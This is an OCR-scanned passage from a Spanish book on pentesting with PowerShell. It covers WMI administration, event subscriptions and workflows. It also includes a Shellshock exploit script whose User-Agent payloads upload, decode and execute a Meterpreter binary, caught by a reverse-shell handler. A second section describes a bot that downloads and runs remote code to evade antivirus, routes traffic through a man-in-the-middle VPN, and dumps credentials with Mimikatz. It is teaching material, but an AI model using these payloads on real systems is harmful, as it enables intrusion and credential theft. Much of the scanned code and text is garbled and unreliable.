través de una ruta de red UNC. En otras palabras, para instalar un paquete MS/ remoto se debe 
especificar la ruta de red !ServidorAplicaciones ruta. La instrucción para realizar una instalación es 
(Get-WMIObject -ComputerName PCI -List | Where-Object -FilterScript |$ .Name -eq "Win32. 
Product ")).InvokeMethod( "Install ", "ServidorAplicaciones ruta) paquete.msi ") 


Para eliminar las aplicaciones la instrucción es similar a la de instalación, simplemente hay que 
ejecutar (Get-WmiObject -Class Win32 Product -Filter "Name- ILMerge ^ -ComputerName . ).In 


vokeMethoc( " Uninstall ",Snull). 


13. WMI 


WMI, Windows Management Instrumentation, es una implementación de WBEM, Web-Based 
Enterprise Management. Con esta tecnologia se pretende el establecimiento de normas estándar 
para el acceso y recuperación de la información con carácter administrativo de los componentes 
fisicos y lógicos. Los recursos administrados son cualquier componente, ya sea físico o lógico, 
que WMI soporte para su administración. Por ejemplo, un recurso administrado son los servicios. 
procesos, el subsistema de disco, la BIOS, entre otros recursos. 
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El consumidor WMI es la aplicación que utiliza la tecnología WMI para acceder a la información 
de un recurso. Normalmente, WMI es utilizado en scripís, como por ejemplo javascript o vbs, 
pero podría ser utilizado por alguna otra aplicación. Por supuesto, también puede ser utilizado en 
scripts de PowerShell. Tanto el consumidor WMI, como los recursos administrados, interactúan 
directamente con el núcleo de WMI. 


¿Qué se puede hacer con WMI? WMI permite recoger gran cantidad de información sobre el sistema, 
actuar sobre partes físicas o lógicas del sistema, evaluar la eficiencia mediante la toma de tiempos de 
ciertos recursos, avisar de la aparición de eventos en el sistema, en conclusión para la administración 
casi total del sistema. 


Clases e instancias 


Las clases son moldes con ciertas propiedades y métodos o funcionalidades. Estos moldes 
representan a los distintos recursos administrados de WMI. Uno de los ejemplos más claros de clase 
es win32 service, la cual define que es un servicio en Windows en el sentido más genérico y utiliza 
distintas propiedades. nombre, estado, descripción, o distintos métodos, arrancar, parar, etcétera, 


Las clases se almacenan en una base de datos del núcleo de WMI. Las instancias de una clase 
son lo que se conoce como objeto en la programación orientada a objetos. Por lo que un recurso 
administrado es una instancia de una clase, con sus métodos y propiedades. Por ejemplo, los servicios 
son instancias de là clase win32 service. 


En PowerShell se dispone del cmdler Get-WmiObject el cual permite obtener información sobre 
todas las instancias de una clase concreta. Su ejecución es sencilla ger-wmiobject win32 bios. Si la 
clase que se proporciona al emdler dispusiera de varias instancias se obtendrá información de todas 
ellas. Por ejemplo, ger-wmiobject win32_process. cuya ejecución devuelve todas las instancias, con 
las propiedades de éstas. 


Para realizar búsquedas de clases respecto a un patrón se puede utilizar el bucle foreach. Una posible 
búsqueda sería la siguiente: get-wmiobject | foreach [$_.name | Select-String -Pattern win32*]. Con 
esta búsqueda se obtienen las distintas clases que comienzan por win32. 


Hay que tener en cuenta que no todas las clases son almacenadas en el mismo espacio de nombres. El 
núcleo de WMI distribuye las peticiones en función del espacio de nombres en el que se encuentren 
las clases. Esta tarea es prácticamente transparente al usuario. 


En algunas ocasiones el usuario quiere buscar ciertas propiedades pero no sabe en qué clase, 0 - 
incluso espacio de nombres, ésta se encuentra. Para estas circunstancias se deberá realizar una 
búsqueda por todo el árbol de clases de WMI. 


La idea es sencilla listar todos objetos WMI con el cmdlet get-wmiobject, iterando sobre cada uno 
de ellos obteniendo sus propiedades para ir filtrando sólo los que tengan el patrón requerido. En el 
presente ejemplo se requiere listar propiedades que contengan la palabra disk e ir obteniendo su 
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clase dónde se encuentran para obtener los valores de dicha propiedad. El código quedaría de la 
as 
siguiente manera get-wmiobject -list | foreach [$ properties} | where [$_.name —match "disk / 


seleci-object origin, name. 


Ejemplo 1: Capacidad de disco 

En primer lugar no se tiene porque saber cuál es la propiedad ni la clase en la que se encuentra 
esta información. Por lo que, primero, se realizará una búsqueda por palabras. como se mencionó 
anteriormente. 

Se ejecuta la siguiente búsqueda Ger-WmiObject -List | foreach 1$_.properties/ Where-Object 1$_. 
origin -match "disk '? | Select-Object origin, name. Se obtienen bastantes propiedades con diversidad 
de clases. Se encuentra la clase win32_logicaldisk. Hay que recalcar que se ha filtrado orígenes. es 
ases, que contengan la palabra disk, obteniéndose las propiedades de dichas clases, 


decir el 


Win32 logicaldisk dispone de propiedades con nombre size y devicelD para su identificación. 
Se ejecutará la siguiente instrucción para mostrar la unidad del dispositivo, la capacidad de éste 
y su espacio libre, Get-WmiObject win32_logicaldisk | foreach |Write-Host $ .devicelD 5 .size 


S reespacej . 


En la siguiente imagen se puede visualizar la salida de dicha ejecución. 
5 


PS C:MUserzwbit 03/85/2012 10:58:57 > Get-Wni0bject vin32 logicaldizk ! foreach (WUrite-Host $ .deuiceID $..zi 


63926918976 
62913587328 21586018048 


I T 783764 


147403648 62585 


348 
Userzwbit E 2812 11:05:57 >M 


Fig. 2:20: Obiención de la capacidad y espacio libre de las unidades de la máquina. 


Ejemplo 2: Estado de los servicios 
En este ejemplo se buscará todos los servicios y su estado en la máquina. Para realizar la büsqueda 
se utiliza el mismo mecanismo utilizado en los ejemplos anteriores. Se obtienen distintos orígenes. 


pero el que más llama la atención es win32_baseservice o win32 service. 


También se puede observar la propiedad s/ate que proporciona información sobre el estado del 
servicio en la máquina. Una vez se dispone de la clase y la propiedad concreta que reportará la 
información buscada. 


bit 03/05/2812 11:51:21 > Get-WniObject uin32 baseservice | foreach (Uvite-Host $ .dicplaynane $ .state) 
«lora de host compatible con OHCI 1394 Running 


"or Microsoft ACPI Running 
r 


nedidor de energía ACPI Stopped 


tion Driver for Winsock Running 
Intel AGP Stopped 
1 


iltro de bus AMD AGP Stopped 


Fig, 2.21: Obtención del estado de los servicios, 


" —— 
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Monitorización de recursos 


WMI crea la posibilidad de utilizar los eventos para la toma de decisiones. En otras palabras, con 
PowerShell y WMI se pueden gestionar los recursos monitorizándolos en función de distintos 
eventos. Cuando un evento se genere, se podrá realizar algün tipo de acción al respecto. Un ejemplo 
sencillo sería la posibilidad de avisar al administrar que la cuota de disco ha alcanzado un porcentaje 
concreto. 


(Qué es un evento? Un evento es una acción generada por un recurso el cual puede disparar una 
notificación que será atendida por un administrador. En esto se basa el potencial de la monitorización 
de recursos. Con estos aplicativos, el administrador puede estar más relajado en su trabajo, ya que 
dispone de herramientas que le ayudarán ante una situación que pudiera ser crítica si el administrador 
no se diera cuenta. 


En PowerShell, versión 2, se dispone de cmelet Register-WmiEvent. Este cmdlet permite suscribirse 
a los eventos WMI. A continuación se especifica algunos de los parámetros más interesantes del 
emet: 


Parámetro Descripción 
Especifica un bloque de scripting. es decir. la acción que debe 


Action à 
realizarse cuando se genere el evento 


Especifica una consulta de WMI, con lenguaje WQL, que 


identifica la clase de eventos 
Sourceldentifier 


Tabla 2.09: Parámetros de Regisier- WiniEvent, 


Indica un nombre que es el seleccionado para la suscripción 


En un ejemplo sencillo se puede observar varias piezas clave en el registro de eventos. Estas piezas 
son la query, la acción y el registro o suscripción a los eventos. 


La query se construye con un SELECT y un FROM, dónde se indica que se quiere seleccionar - 
los eventos de tipo — /nstanceCreationEvent, es decir, los eventos de creación de objetos. En 
otras ocasiones pueden interesar otro tipo de eventos como de modificación o eliminación, 
— InstanceModificationEvent,  [nstanceDeletionEvent. Existen otro tipo de eventos, pero los 
comentados anteriormente son los interesantes. 


Por otro lado se muestra un objetivo o hacia quien va dirigido con Target/nstance. En este objeto 
o instancia se puede también realizar búsquedas en función de las propiedades, muy interesant 
en muchos casos. También hay que definir el significado de las palabras ZSA y WITHIN. ISA indi 
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a que clase debe pertenecer la instancia que se quiere monitorizar. WITHIN indica el intervalo, en 
segundos, en el que se ejecutará el administrador de eventos. 


La sintaxis de una query se escribe de la siguiente manera: 


seonsulta = "SELECT * FROM Instance[Creaticon|Modification|Deletion]Evenc 
udi WITEIN 5 

WHERE TargetInstance ISA '«4instancia de clase»' 

[AND Targetinstance.propisdad = '«valor»']|" 


Hay que recordar que los corchetes aportan un significado de opcionalidad. Las consultas o query 
siempre dispondrán de un formato similar al del ejemplo anterior. 


Por otro lado, se especifica la acción que se debe llevar a cabo una vez ocurra el evento. Para 
ello se dispondrá de una variable con un ScriptBlock dónde se especificará que acción realizar. 
En los ejemplos se utilizará la salida por pantalla, pero podría enviarse correos electrónicos al 
administrador, apagar equipos remotos, acciones administrativas automatizadas, o cualquier tipo de 
tarea que se requiera. 


Por último se registra el evento, por lo que habría que esperar a que ocurriese dicho evento para 
obtener los resultados, especificados en la acción. 


Una vez se ha estudiado como registrar eventos, se va a estudiar como eliminar estos eventos 
del administrador de eventos. Puede ocurrir que el administrador quiera eliminar su regla creada 
anteriormente. Para ello se dispone del calet Get-EventSubscriber. Este emdlet recupera todos los 
eventos registrados, identificados con un número. Este número puede ser utilizado para eliminar el 


evento. 


En primer lugar, se ejecutará Ger-EvemSubscriber para obtener el identificador del evento que 
interesa, Después se utilizará el cmdler Unregister-Event para desregistrar dicho evento. El ejemplo 
sería, Get-EventSubscriber -Subscriptionld <número> | Unregister-Event. 


14, Un exploit con PowerShell 


El 24 de Septiembre de 2014 se publicó el descubrimiento de una v ulnerabilidad en Bash, Bourne- 
Again Shell, con la que un usuario podría ejecutar código. Esta ejecución puede ser remota ya que 
muchos procesos invocan a bash en su ejecución, por ejemplo un servidor web que necesita generar 
un sitio web dinámicamente. A esta vulnerabilidad la apodaron Shellshock y para muchos fue una 
de las vulnerabilidades más críticas del año 2014. ya que permitía realizar una ejecución de código 
arbitrario en remoto. El expediente de la vulnerabilidad inicial es CVE-2014-6271 descubierta 


por Stephen Chazelas, aunque durante los dias posteriores fueron saliendo publicadas diversas 
modificaciones. 


EN Pentesting con PowerShell 


¿Cómo funciona? Al final, en el caso de un servidor de Internet se puede necesitar ejecutar un 
script de bash para generar un sitio web. Este script puede necesitar información externa, como por 
ejemplo el User Agent. Para pasarle al script esta información se hace a través de las variables de 
entorno, 


La vulnerabilidad radica en que bash sigue leyendo y ejecutando lo que encuentra después de la 
definición de una función en una variable de entorno. En la siguiente línea se define una función 
x vacía y después se concatenan diversos comandos, los cuales serán ejecutados por el intérprete, 
Como ejemplo se presenta la siguiente instrucción env x = '() / :; /; echo vulnerable 'bash—c “echo 
explotado”. Bash seguirá leyendo después del cuerpo de la función, y ejecutará el código que está 
justo después, imprimiendo por pantalla el texto vulnerable y explotado. 


PoC: Explotando Shellshock desde PowerShell 


En esta prueba de concepto se muestra un escenario en el que un servidor web es vulnerable a 
Shellshock por tener bash desactualizado. El header User Agent enviado desde el cliente al servidor 
web es utilizado como variable de entorno para pasárselo a un script de bash, por lo que se podria 
ejecutar comandos sobre la máquina remota. 


El escenario que se presenta es el siguiente: 
- Máquina Kali Linux que es vulnerable a Shellshock. 
- Máquina Windows 8 con PowerShell versión 3. 
- Elpentester ha evaluado el entorno y ha encontrado la vulnerabilidad. 


El script es parametrizado, por lo que puede recibir la dirección URL del servidor que será explotado, 
un parámetro de tipo switch, es decir un flag de verdadero o falso, y un tercer parámetro que será la 
shellcode en base64 que se quiere subir al servidor remoto con el fin de ejecutar dicho código. 


La ejecución de este script se llevaria a cabo de la siguiente manera shellshock.ps1 —url <dirección 
URL> [-exploit] -base64 <shellcode en base64>. Hay que notar que el /lag exploit es opcional y no 
obligatorio, por ello se encuentra entre corchetes. 


param ( 


switch] 
[Parameter (! 


) 


La primera función a realizar es la denominada request con la que se podrá realizar las peticiones 
maliciosas contra el servidor. La función request está parametrizada por la dirección URL que 
se recibe por el invocador y por el User Agent, que será el campo que correctamente modificado 
permitirá la explotación de la vulnerabilidad. La función devuelve, a través de la variable $response, 
la respuesta obtenida. 


g—— 
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La segunda función se denomina check y permite verificar si la máquina remota es vulnerable a 
Shellshock. La función check recibe un parámetro de forma obligatoria, ya que se indica con la 
cláusula Mandatory. La función check invoca a la función request para realizar una petición y poder 
comprobar si la instrucción “echo hola” es ejecutada en remoto. De ser cjecutada, el pentester 
podría verla reflejada en la respuesta del servidor. La función check devuelve un valor hooleano. el 
cual se obtiene tras ejecutar la instrucción return (Sresponse.RawContent.Contains( “hola")) . En 
esta condición se comprueba si la respuesta contiene la palabra “hola” o no. 


function reguest( 
param( 
! [Parameter (Mandatory) j 
[string] $url, 
[Parameter (Mandatory) ] 
[string] SuserAgent 
Sur1 


esponse = Invoke-WebRequest -UserAgernt 


) 
Sr 
return $response 


am ( 
(Parameter 
rstring] $url 


sponse 
sponse.RawConte 


(Sresponse.RawContent. 


return Contains (“hola”) ) 


Por último, existe un main en el que lo primero que se hace es comprobar, mediante el uso de la 
función check, si la máquina remota es vulnerable a Shellshock. En caso de que la máquina remota 
no sea vulnerable se finaliza la ejecución del seripr. 


Si la máquina remota es vulnerable se pasa a comprobar si el flag exploit ha sido activado en 
la ejecución del serip. Si no ha sido activado en la ejecución del script, éste finalizará sin más 
acciones que realizar. Si por el contrario este flag ha sido activado se ejecutarán 4 peticiones contra 
la dirección URL proporcionada: 
- La primera petición Sresponse = request -url $url -userAgent "() | :; }; echo; /bin/echo 
Sbase64 > /tmp/pay" sube la shellcode en base64 al servidor remoto y crea un fichero en / 
tmp/pay con dicho contenido. 
- La segunda petición $response = request -url $url -userAgent “O | :; ]; echo; /bin/ 
cat /tmp/pay | /usr/bin/base64 -d 7 /tmp/pay2" transforma el contenido del fichero subido 
anteriormente, el cual era base64, a su formato original, en este caso un binario elf. 
- La tercera petición Sresponse = request -url $url -userA gent "() | :; /; echo; /bin/ehmod 
744 /tmp/pay2 " cambia los permisos del binario para poder ejecutarlo en la siguiente petición. 
ho La cuarta petición Sresponse = request -url $url -userAgent “() { :; }; echo; /tmp/pay2" 
£jecuta el binario. 


E 
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irl $url -userAgent "() & b ; /pin/echo la 
echo "exploit - 
gs A e cq — P - "(| q :; ); echo; /bin/echo " — 
ep nein - request -url $url -userAgent “1) 1 = rr ostentat 
S$respon - request 
Sas > dpa Hinar " 
Sbase64 > 4 dc II in base64 to binary..- air p: Y: echo; /bin/cat /tmp/ ' 
o sa gest -url $url -userAgent H + a B 
Sresponse = request : E 
pin/base64 -d » /tmp/paye 
ads T : " ! f 
pay echo "chmod to binary... Gs * z; ); echo; /bin/chmod 744 
pei ; quest -uri Surl -userAgent () Y 
5response = request -uri vur 
ng. and take control!" ^ .. Ys echo; /tmp/pay2" 
z péquest url $url -uüserAgent 0 E ; el p/E m 
reg Surl iserácent ; T ji : 
| EAI 
ileod £4 
eise A" | ! | i 
t " vae 
" — T 
ecn no ulnerabl > | 
ł " zc 8 - erAdGen (o 1 å " i 
quier cos: > haya sido originalmente " E 
«tá ejecutando? Realmente puede ser cualquier cosa que hay: "— 
¿Qué es lo que se está eject e64. P te ejemplo se ha creado un Mererpreter para Linux} l mE | 
m binari asado a base64. Para este eJ seh | 
un binario y se haya pasado a basec E — 4 iti e 
se había pasado a base64. 


ade utilizar un módulo de Metasploit que e 
p r shellcodes y codificarlas en base64 se ines ME NS n i Ametasploit-framework 
— vez K e S y A -— . 22 De/ era: 
iade l iguiente dirección URL hups://github.com/pablogonza e y Früh 
encuentra en la sigu à s : enerate pavload base64.rb. 
biok i ydules/exploits/ y el fichero se denomina generate pavíodd | 
xob/measter/noc ee "m su 


t se T d > ell h j col pleto 
A nunu esenta H pD v 10n ac Sh Ils OCK 

ontint 1010 pr senta el se 1] para la explo ac 

c 


i = la vulnerabilidad shells- A continuación se puede visualizar una imagen en la que se ejecuta el script de Shellshock con los 
4 agueál d x: . ^ 
Descripción: Script que permite ches diferentes parámetros. 


PMisersNpgonzalezNDesktop? .Nshellshock.psí -url http://192.168.56.1982 

bin/vuln.cgi -exploit —base64 £BUMRgEBAGRnnnnananannaranenBananu a ECDORR 
— INAAAARARADOATARABARAARAAAARARARARAARAAAARIAECACABA¡2AAAAGAEAAACARAAAEARAZEDZ 
r (Mandatory) JA biUNBLhKcmxEoPFBDFFFgNFFuJgBpkllaTpe ige /UEpeXt8T9/q201 EI 7udNb1 qKNTS nd 
i, Lhjqbi/u6movrxNoC68 Q3GC5 DaIDNpi VL pNnPnbup8 yxDNhI = 
za : Gexploit = SfalsB, jet vulnerable 


oit. 


Md hellcode... 


: FOUMRyEBAQARARAARAARAAAATAANABARAAVIAECDOAARARAAAAAAAAAD 
PAAAAAAAAARERAARAAAAARATAECACABA¡2AAAAGAFARACAAAAAEAAA2EDZACTORDiUNBLh 
'PFBDFFFgNFFuJyBpklaTpeige 
equest I 


) 1 /UEpestBT9/q201/EI"7udNb1gKNTZ/nJHeagLhjqbi^ 
"xNuC68Q3GC5 DxJDNp1 ULpNnPnbup8 yxDNhI = 
ade in base64 to binary... 
¿to binary 

ing. "o 
al Şurl; 
ater (Mandatory) ] 


and take control? 


Agent 


Fig, 2 . Ej "cución del scr ipt que explota la vulnerabilidad de Shellshock. 
c T 2 > Us ^hremne GSucerAgent k 
Sres se = nvoke-We -UserAgent SuserAgen 
Web! jest Surl Jser: j 
response Invoke-Wenbxeque 


| a 
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o del script se debe configurar el módulo exploit/multi/handler de 
r inverso. Cuando las 4 peticiones del script visto 
máquina interactuando con 


Previamente al lanzamient 
Metasploit para recibir la conexión del Meterprele 
anteriormente se hayan ejecutado, se obtendrá el control remoto de la 


una consola de Meterpreter. 


Fig, 2.23: Configuración del módilo exploit/mulli handier de Metasploit para vec ibir conexión. 


15. Un bot en PowerShell para pentesting 


erramientas necesarias en uni 
Teniendo acceso físico a un equipo, ya sea con privilegio 
e Microsoft Vista viene de forma nativa 
ar gran cantidad de acciones, las cuales 


En algunas ocasiones un auditor o un atacante no disponen de las h 


| Microsoft Windows. 


máquina con sistemé 
a PowerShell. Desd 


o sin él. se tiene al alcance de la mano un 
en el sistema operativo, y puede ser aprov echada para ejecut 
muchas de ellas pueden pe 


encuentren en la red. 


rmitir realizar ciertas acciones en la propia máquina o contra otras que s 


ódigo a través de la Pow er Shell. Este códigt 


a la posibilidad de ejecutar € 
bvpasseando las politicas de 


cargándola de ubicaciones remotas y 
libro. existen diferentes formas para llevar a cabo un bypas 
este apartado para crear un bot & 
esumen del trabajo expuesto end 
a Give me a PowerShell and I 


En este apartado se present 
podrá ser ejecutado en local, des 
ejecución. Como se menciona en este 
ión. Las técnicas que se exponen en 
onal y útil en un pentes?, son un T 
ba Security Congress en la ponenci 


de las políticas de ejecuc 
PowerShell, totalmente funci 
congreso de seguridad Qurt 
move vour world. 

| hor es tener acceso fisico al equipó 
¿Qué se puede hacer sin un Y 
? ¿Se 


para el pentester antes de la creación de 
no disponer herramientas a mano O la posibilidad de ejecutarlas. 
¿Qué se hace sin Foca? ¿Se podrá dejar una backdoor en esta máquina sin privilegio: 
in las herramientas adecuadas? ¿Se puede ejecutar cualquier 
a cada una de las preguntas ant 
l es descargar CU 


El punto de partida 


manipular tokens de Windows s 
en la línea de comandos? PowerShell proporciona la respuesta 
gracias al potencial que ofrece esta línea de comandos. La idea conceptua 
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. AO sede j RNN. 
tipo de código desde una ubicación externa a la organización, el | 
a organiz , el cual no sea detect: 
ctado por ningún 


elemento de seguridad de la organizació : 
la organización, y poder realizar acciones en e Aros 
equipo de la red. 1es en el equipo fisico o algún 


ay circunstancias e PEO i 
ja it de Antes pia tener en cuenta, La utilización de este tipo de bots en la líne 
i la s Rr uda a saltarse diferentes mecanismos de protección. por ers 
permite al pentesier ev adir sistemas de seguridad como puede ser un anti : rotección, por ejemplo, 
puede evadir las famosas listas blancas de ejecución de aplicaciones m Además, el pentester 
ic eren crgo o soplos amio is T 
i . rtas s i ke Bg "n à € "atico h 
page "s et 5 org mer se puede utilizar proxies a través de los pa | ; à 
A AA Josse código a través del terminal. Estas características alets de 
contrarrestar la limitación de la no disponibilidad en el equipo de — e isticas ayudan a 
amientas. 


Antes de seguir describiendo el bot es i : 
también Podrían mi nre tdi o QUE eati: Hpo SIO Aik podilan ser vest 

WE aucta e ómo Twitter, Facebook o Pastebir como manel de inte emotos 
e incluso como fuentes dónde descargar las fanéianes v ofidiona A Ves de HISS ucciones. 
en cuenta que el hot puede ser todo lo complejo que se quiera, incluso pa » eas S debe un 
tipo de malware interactuando con el registro de Windows : vni à. " por ria acabar siendo un 
ya sea porque se introduzca en una orden en el registro o. porque se dc persistencia de algún modo. 
extensión ps. " . porque se genere algún tipo de scripr con 


En este apartado se pretende di 
apartado se pretende 'r de 5 j 
pretende disponer de un esqueleto básico de un bot con el qu | 
el que cada usuario 


meda aumentarlo en función de bd 
o | en función de sus necesidades. El esqueleto básico del bor : , 
cual se encarga de iterar y € hs Y PRR 181 el hot será un bucle while e 
2 erar y comprobar qué funciones se quiere descargar x : cle while el 

scargar y, posteriormente, cargar c 

E » tC. Cargar en 


cl ámbito de ejecución de P Shell 
de PowerShell para después poder invocarlas 


mma rr 


Mag 
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Scomando 


e) sSend-Tw 


" 


"and -ne "quit! 


¿Cómo se carga el código? A través de funciones que son descargadas a través del emdlet Invoke- 
WebRequest. Con este cmdlet se descarga el código desde un servidor web. aunque como se ha 
comentado se puede descargar desde otras ubicaciones, por ejemplo Twitter o Pastebin. 


El código que se quiere ejecutar no se encuentra hardcodeado en el script, por lo que se entiende 
que el código es cargado en el ámbito del script dinámicamente, dotando de gran potencial a este 
tipo de bots. Cuando el código es descargado en forma de función de PowerShell se utiliza el emdla 
Invoke-Expression para cargar la función en el ámbito del scrip! con el fin de poder invocarla de 
ahora en adelante. 


ESA sou 


os comandos pueden ser leídos 


n los comandos? Como se mencionó anteriormente | 
| propio servidor web 


por ejemplo. También puede ser leído de 
y entendiendo que el usuario $ 
prompt. Se decidió utilizar un 


¿De dónde se lee 
en remoto de una cuenta de Twitter. 
dónde se cargan las funciones dinámicamente. En este ejemplo, 
encuentra en un entorno local, será éste el que los introduzca desde el 
nomenclatura básica, la cual consta de tres partes: 


- Comando de carga denominado lodd. 


El segundo comando indica el nombre de la función que acaba de ser cargada con Invoke 
WebRequest concatenado con Invoke-Expression. 
indica los parámetros que deben ser pasados a la función: 


- El tercer comando es opcional e 
I 


que se ha cargado en el ámbito del script previamente. 


En resumen la sintaxis es la siguiente load | «nombre función | «argumentos de la función 
Supóngase que existe una función como la que se muestra en la imagen. Desde el prompt pe bot! 
ejecuta la instrucción load | vpn initm | -ip «dirección IP vpn server>. y ¿ahora qué ocurre: 
se puede ver en el código, una vez se introduce la orden, se descarga y carga el código en el 
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del script en forma de función y se invoca su ejecución. En este caso esta función generará i 

de VPN y realizará la conexión a un servidor de VPN ubicado en la dirección " ie n pus 
función. ¿Qué PA consigue con este ejemplo? El tráfico de la máquina dónde se babara pa 
comenzará a salir por defecto por el servidor de VPN consiguiendo realizar un Man /, The epoca 
ya que todo el tráfico puede ser monitorizado por el usuario remoto. | l dins 


EAS 


rara 


Archivo Edición Formato Ver Ayuda 


¡ function vpn_mitm( 
param 
( 
[Parameter(Mandatory)] 
[string] Sip 
) 
Add-VpnConnection -Name proof- 
| ServerAddress Sip -TunnelType Pptp - 
| AuthenticationMethod MSChapyv2 
| rasdial.exe "proof" pablo metasploit 


1 
J 


Fig. 2.24: C : ichen ; ió 
g Código en un fichero TXT de una función que se puede cargar con el boi 
e - 


Otro ejemplo de código que se puede ejecutar es un mimikatz. Este código se puede obtener 
del conjunto de scripts que proporciona PowerSploit a través de su github hit z lei y e 
mattifestation/PowerSploit. Sobre PowerSploit se estudiarán muchas más inm a wem 
capitulos del libros. Como se puede visualizar en la imagen, una vez que la fim ión i Me 
y ejecutada en el ámbito del bor, la salida proporciona información de las na =s ini ya 
usuarios que han iniciado sesión en el sistema. Es importante recordar que Ps ca e E 
en el sistema se debe tener privilegios. —— 


Authentication Id : Ø ; 64899 <BABBBBBB: BABAFAS3> 
S ion * Interactive fron 
,Nane = Administrator 
* pshe118 
| 61-65-91 -36972* - " 
Bec: $-1-5-21-3587275698-1183418431-608809615-598 
[8888889831 Primary 
Usernane * fidninistrator 
PUN in pshe118 
a 8735172c3a77d2c65aacd84c 
HAM 7015aa2627690da1108e59c 2937 
sE = 354417c7a665da7483738c65d8dc 
* Username Administrator 
* Domain = pshell8 
"P "d |: 123abc.. 
udig : 


b3f1ichbe274 


Administrator 
pshe118 
123abc.. 


fidministrator 
pshe118 
123abc.. 


Donain 
Passuord 


En. we. Es za m 
Fig. 2.25: Ejecución de la función de Mimikatz a través de PSBol. 


ro 
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A continuación se puede ver un recopilatorio de proyectos, conjuntos de scripts y frameworks que 
utilizan código PowerShell para ejecutar acciones a bajo y alto nivel y pueden ser utilizados en 


ataques en un pentest. 


En los próximos capítulos se estudiarán diversos frameworks, y aunque ahora se hace un pequefio 
resumen de los utilizados en este bot, hay otros que aportan muchas funcionalidades interesantes 
para el pentesting con PowerShell. 
- PowerUp. Proporciona diferentes herramientas para llevar a cabo escaladas de 
privilegios en Windows. Su Github está en la dirección URL. Autps://github.com/Veil- 
Framework/PowerTools/tree/master/PowerUp. 
- PowerSploit. Como se comentó anteriormente es el conjunto de scripts de PowerShell 
por excelencia. Su Github está en la dirección URL https://github.com/mattifestation/ 
PowerSploit. 
- Posh-SecMod. Un framework el cual permite interactuar con Shodan, Metasploit o 
Nessus. Puede ser utilizado en post-explotación o identificación y descubrimiento de activos, 
Su Github se encuentra en la dirección URL https://github. com/darkoperator/Posh-SecMod, 
- PEchecker. Estos scripts comprueban las opciones de compilación y mecanismos de 
protección como son ASLR, DEP, SafeSEH, entre otros. Su dirección URL de Github se 
encuentra en ht1ps://github.com/NetSPVPEchecker. 


16. Workflows 


Los workflows o flujos de trabajo permiten al administrador utilizar éstos para ejecutar tareas 0 
acciones en paralelo en la propia línea de comandos. Esta funcionalidad puede ser realmente ütil 
para aprovechar el potencial de la máquina y los recursos hardware y, además, automatizar de 
manera más eficiente las tareas a realizar en el día a día del pentesting. 


Estos flujos de trabajo aparecen en la versión 3.0 de la línea de comandos de Microsoft y aportan 
potencia al usuario. 


¿Por qué los workflow en Powershell? Esta pregunta tiene una sencilla respuesta, la nube y los | 
centros de datos basados en Windows. La computación en la nube proporciona alta disponibilidad, 
servicios escalables que aprovechan un gran volumen de datos, etcétera. 


La gestión del cloud tiene que ser fiable y para disponer de esta fiabilidad se integran los workflows 
en Powershell. Suelen ser flujos de trabajo de larga duración que están disefiados para soportal 
errores de los componentes o dispositivos de red, es decir, resistir a los fallos. 


Powershell se aprovecha de la escalabilidad y la madurez en la que se encuentra Windows Wo 
Foundation 4.0 para llevar los beneficios de los flujos de trabajo a los desarrolladores en Powers 


Los objetivos principales de los workflow son los siguientes: 
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i e la automatización a Ves de un a i 
4 (0) traves ran numer 30 
o de equipc ` 


- Realizar mayor número de tareas en paralelo para lograr una optimización de tiempos. 


Se mejoraron los siguientes aspectos: 
- Flujo de trabajo simplificado. 
- Reutilización del conocimiento existente, es decir, en Windows Wokflow Foundation. 
- Realizar un flujo de trabajo fiable. 
- Rendimiento y escalabilidad. 


El flujo 


Para la creación de flujos de trabajo se ha reutilizado la sintaxis de Powershell. Este movimiento de 
Microsoft se produce para facilitar al usuario que ha invertido tiempo en el aprendizaje de esta linea 
de comandos. Los workflow XAML, eXtensible Application Markup Language, son compatibl i 
con Powershell, por lo que si se disponen de este tipo de workflows suguitén atédo udin u 


Si el administrador o pentester escribe con asiduidad scripts en Powershell será realmente sencillo 
: escribir los eoa de trabajo. Se aprovechará los conocimientos que se disponen para el desarrollo 

e scripts y simplemente afiadiendo nu cas, construccione à 
p evas, pero pocas, construcciones se generarán los workflows. 


Antes de ver el esqueleto de un workflow se debe tener en mente algunos conceptos como son la 
DM "nr UD / ll el > - A 1 A | à 
sección paralela y secuencial que serán estudiadas más adelante. 


A continuación se especifica el esqueleto de un workflow y el aspecto que éstos tienen: 


tEr rime war se indis : 1 
£n primer lugar se indican mediante la palabra reservada worktlow 
Workflow prue TEN 


al 

ISe mostrará por pantalla la 
là mundo!” 

prueba 


Hay que destac: N: tat ; 
icd : destacar que el cierre de llaves no indica el final de la ejecución como se puede pensar a 
^ Per LI A Š M s T 
an $ ` 4 es escribiesen órdenes después del cierre de llaves, antes de indicar el final del workffow 
palabra que da nombre al flujo de trabajo, se ejecutarían previamente al lanzamiento de las 


instrucciones que se encue interi 
à s se encuentran en el interior d | je > igui 
A" or de las llaves. Como ejemplo se propone el siguiente 


lEn p - " 
tn primer ugar se indi E 
i r iug se indican mediante la palabra reserva d! 
iride zm a la palabra reservada workilow 
M Se mo 
Je OStrará por nanta 3 f 

"rara por pantalia la frase hola mundo! 


hola mundo!” 


Clear-host 
*et-childitem 
Prueba 
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Directori 


prueba 


o: C:NUsersNfidmnin 


5/06/2012 
25/06/2012 
25/06/2812 
25/86/2012 
25/06/2012 

7/06/2912 
70672612 
/06/281 

25/06/2912 
25/06/2012 


strador 


Contacts 
Desktop 
Docunen 
Dounloads 
Favorites 
Links 
Music 
Pictures 
Saved Games 
Searches 
Videos 


Fig. 2.26: Ejecución de un workflow básico 


Existen ciertas palabras reservadas para optimizar y configurar la ejecución de los workflows. Se 
puede requerir ciertas tareas en paralelo y otras de manera secuencial. Para ello se dispone de las 


palabras reservadas Paralle 


21 y Sequence. La semántica es bastante sencilla, si en el cuerpo de un 


workflow se indica un campo Parallel abriendo llaves se especifica que las tareas que se escriban en 


el interior de ese campo se 


indica un campo Sequence 


realizarán en paralelo. Por el contrario si en el cuerpo de un workflow se 
se indica que las tareas que se encuentren en el interior de las llaves se 


ejecutarán de manera secuencial, es decir, siguiente el orden de aparición en el script. Como ejemplo 


se puede observar el siguiente: 


Directorio: 


Segunda 


d-r-- 


egunda tarea 


tarea 


C:NUser 


S 


;turiteTime 


25/06/2012 


19/05/2012 


19/07/28 
19/07/72 


Length 


Length 


Name SComputerName 


Administrador localhost 


Public localhost 


i64. : localhost 
proc.tx localhost 


Nane 


PSConputerNan 


localhost 
localhost 


fidministrador 
Public 


localhost 
localhost 


C api 
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— 


Se puede observar como la ejecución en paralelo puede provocar que cuando las 


utilizar el recurso de la pantalla la salida de información sea entre medias, y ejecutando 3 


cas requicra 


Varas 
